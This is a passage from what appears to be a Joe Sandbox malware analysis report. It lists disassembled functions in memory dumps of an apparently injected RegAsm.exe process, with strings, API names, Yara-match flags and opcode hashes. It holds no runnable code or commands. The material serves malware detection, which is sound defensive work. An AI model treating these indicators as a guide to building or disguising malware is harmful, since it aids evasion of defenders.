                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 1FBD0FE7
                                                    • CatchIt.LIBVCRUNTIME ref: 1FBD10CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID: CatchEncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 1435073870-2084237596
                                                    • Opcode ID: 8220ebe14669c1572dd1f276e037f7b5989f06937cfa4e361f283631d9298288
                                                    • Instruction ID: b3c6ec981fbbc208cb96c9e2f7ba97ea049199c968d291a225ff0aaf15b238f8
                                                    • Opcode Fuzzy Hash: 8220ebe14669c1572dd1f276e037f7b5989f06937cfa4e361f283631d9298288
                                                    • Instruction Fuzzy Hash: 16414A75A00349EFEF06DF94D980AEE7BB5FF48308F148099FA04A7221E339A950DB51
                                                    Function 1FA34CE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: temp$wrong number of vtable arguments
                                                    • API String ID: 0-2849069181
                                                    • Opcode ID: e8ca9b2a38d53959cc7794656dbeecfd173e863d24c511612eece75eeb49af9b
                                                    • Instruction ID: ac5c3ecbbd75e4724088b5b1858fd843208ae236f29b0ca53aa751ded6797083
                                                    • Opcode Fuzzy Hash: e8ca9b2a38d53959cc7794656dbeecfd173e863d24c511612eece75eeb49af9b
                                                    • Instruction Fuzzy Hash: D951B1B59043458FC714CF28D44099ABBF5BF89304F404A6DE8865B705D73EFA4ACBA6
                                                    Function 1FA635E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA635F9
                                                    • misuse, xrefs: 1FA635F4
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA635EA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-3564305576
                                                    • Opcode ID: 44b35c34f9f3959501a560f3c90c2ffe89b03125d312ac5fb74f574831aff871
                                                    • Instruction ID: 19f24de9db6fba9540e823cddcb68f532b15af5850072c82bdb1f35e24ae9ee1
                                                    • Opcode Fuzzy Hash: 44b35c34f9f3959501a560f3c90c2ffe89b03125d312ac5fb74f574831aff871
                                                    • Instruction Fuzzy Hash: E151D0F5A04311AFDB14CF24C884A56BBA5BF44734F058268E9599B392E33DF811CB92
                                                    Function 1FAD96B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FAD97EF
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FAD97E0
                                                    • database corruption, xrefs: 1FAD97EA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: d015dd2a7f34c451068c132c19013bc6b102c1382bca839e948fb3c3e2802f10
                                                    • Instruction ID: e33e3572ca720bed543e10fba22033a6bbe36e165a32b8ce0169b55903a816d4
                                                    • Opcode Fuzzy Hash: d015dd2a7f34c451068c132c19013bc6b102c1382bca839e948fb3c3e2802f10
                                                    • Instruction Fuzzy Hash: 3F41167A6047908ED3218F7894406D2FBF29F45261F1848AAE6DA8B652E22EF485D361
                                                    Function 1FBA5960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FBA5985
                                                    • misuse, xrefs: 1FBA5980
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FBA5976
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                    • API String ID: 0-3564305576
                                                    • Opcode ID: 4dee6c66e731c8bbfde0f55c327c664e0fe1867c5ba594d1a1f141b5cc568fbf
                                                    • Instruction ID: f304025d08588409dc616e22ad8d377230a79c13e8264a0b2489372a6e5a6f4e
                                                    • Opcode Fuzzy Hash: 4dee6c66e731c8bbfde0f55c327c664e0fe1867c5ba594d1a1f141b5cc568fbf
                                                    • Instruction Fuzzy Hash: 0D41C875A183519BD310CA54EC80BDAB7E4EFC5320F850569FD449B251F32AFA94C7A1
                                                    Function 0041FF68 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: memcpy
                                                    • String ID: .B
                                                    • API String ID: 3510742995-2223122701
                                                    • Opcode ID: baa5ac8c085634893296bc95198d3ef19f3bf6896aab1c798a73eaf56a55e78e
                                                    • Instruction ID: 3936ad43011f4a34ae65407fdc409fee0955b5fb060a6ad75fe83edbfb145cce
                                                    • Opcode Fuzzy Hash: baa5ac8c085634893296bc95198d3ef19f3bf6896aab1c798a73eaf56a55e78e
                                                    • Instruction Fuzzy Hash: 5151B475A00209EFDB45CF98D582EAEBBF1BF08314F50805AE904AB352C775E991CF94
                                                    Function 1FA65390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA6540D
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA653FE
                                                    • database corruption, xrefs: 1FA65408
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: d2cbfcf53f7559308e06489bc7864be563d2760d653e3601737b133fab3fdc5b
                                                    • Instruction ID: 3a75342b2437015f7547589c93229cea63c440df710ba5ec0fd3a745aee27ff1
                                                    • Opcode Fuzzy Hash: d2cbfcf53f7559308e06489bc7864be563d2760d653e3601737b133fab3fdc5b
                                                    • Instruction Fuzzy Hash: F5316D696407914ED7218F7998407E6B7E29F81B32F4404AEE9C9C7681F31EF492D361
                                                    Function 1FB47ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • error in tokenizer constructor, xrefs: 1FB47F92
                                                    • no such tokenizer: %s, xrefs: 1FB47F1B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: error in tokenizer constructor$no such tokenizer: %s
                                                    • API String ID: 0-815501780
                                                    • Opcode ID: 119c0d9d7b88d56b949b694f521f13c78e0eb099555bf21e46d5595709ecc50c
                                                    • Instruction ID: b7419f8cb2e181d9eae9225559308e9bd9ba0e3aec83cd4453cfd775871d2b8d
                                                    • Opcode Fuzzy Hash: 119c0d9d7b88d56b949b694f521f13c78e0eb099555bf21e46d5595709ecc50c
                                                    • Instruction Fuzzy Hash: DE31BE767013558FC720CF19E880AAAB3E4EF85665F24066DE989DB340E736FC05DB61
                                                    Function 1FA2F000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • second argument to nth_value must be a positive integer, xrefs: 1FA2F0C4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: second argument to nth_value must be a positive integer
                                                    • API String ID: 0-2620530100
                                                    • Opcode ID: ac7d5bd82d8b6bb357477d10ec093192bedda311808f0f5068caa576814f9d48
                                                    • Instruction ID: fb72b77376391a957d029b3782bdbf307859b1efba3c88fb63f73dfe0836495f
                                                    • Opcode Fuzzy Hash: ac7d5bd82d8b6bb357477d10ec093192bedda311808f0f5068caa576814f9d48
                                                    • Instruction Fuzzy Hash: 41314CB6B043029BDB109F24ED4161A77E8BF40320FC04669FD656A281F73EF9568692
                                                    Function 004205DF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 89fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • memcpy.MSVCRT ref: 0042064F
                                                    • ReadFile.KERNEL32(00000000,?,B,B,00000000,?,00420909,?,00004000), ref: 004206B7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileReadmemcpy
                                                    • String ID: B$B
                                                    • API String ID: 1163090680-1683576927
                                                    • Opcode ID: 2874c96c1a3fb1d6f529222d988309bdd38897db4b5591327cded6f4bf57379f
                                                    • Instruction ID: 3350042a6c51f04880dfdfea5df5fcaa4f764afd8a650415a2b95efad18d2465
                                                    • Opcode Fuzzy Hash: 2874c96c1a3fb1d6f529222d988309bdd38897db4b5591327cded6f4bf57379f
                                                    • Instruction Fuzzy Hash: C041B874A00119EFDB00DF98C984EAEB7F1FF48304F5484A9E865AB362D731A951DF54
                                                    Function 004100BC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.3051781987.0000000000439000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004D1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000004DD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000502000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000050E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.000000000052D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000539000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.00000000005C8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3051781987.0000000000643000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Xinvalid_argumentmemcpystd::_
                                                    • String ID: @$string too long
                                                    • API String ID: 1835169507-3505284975
                                                    • Opcode ID: 97d0f1b98fc2f47163ac69db9438ff46e1ccc5032542e301bc2461104f49f8a3
                                                    • Instruction ID: d64a219e406327f520cca0adf51a5824ce34410b5353565fc67751056c402b57
                                                    • Opcode Fuzzy Hash: 97d0f1b98fc2f47163ac69db9438ff46e1ccc5032542e301bc2461104f49f8a3
                                                    • Instruction Fuzzy Hash: AA41B774A0021AEFDF04DF98D9819EEBBB1FF09300F10445AE821AB351D779AA81DF59
                                                    Function 1FA65280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA65301
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA652F2
                                                    • database corruption, xrefs: 1FA652FC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.3059117906.000000001FA28000.00000020.00001000.00020000.00000000.sdmp, Offset: 1FA20000, based on PE: true
                                                    • Associated: 00000002.00000002.3059099529.000000001FA20000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FA21000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FB86000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059117906.000000001FC2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059685570.000000001FC62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000002.00000002.3059706010.000000001FC6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1fa20000_RegAsm.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
                                                    • API String ID: 0-2528248365
                                                    • Opcode ID: b7ef9beae62e0e6f7d660fcdbf0a3a467049bcc7bd4564e62cc4bac5b8d6643a
                                                    • Instruction ID: 720aa93a29e57ae37345a5e77676ce872be62684864ec3cdd0d4d330aa68c569
                                                    • Opcode Fuzzy Hash: b7ef9beae62e0e6f7d660fcdbf0a3a467049bcc7bd4564e62cc4bac5b8d6643a
                                                    • Instruction Fuzzy Hash: B11157BB6002006BCB105B98FC00CDBBFE5EFC46B6F0905A5FA4C56122E727E92197A1
                                                    Function 1FA6FD60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • %s at line %d of [%.10s], xrefs: 1FA6FE82
                                                    • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1FA6FDE6, 1FA6FE61
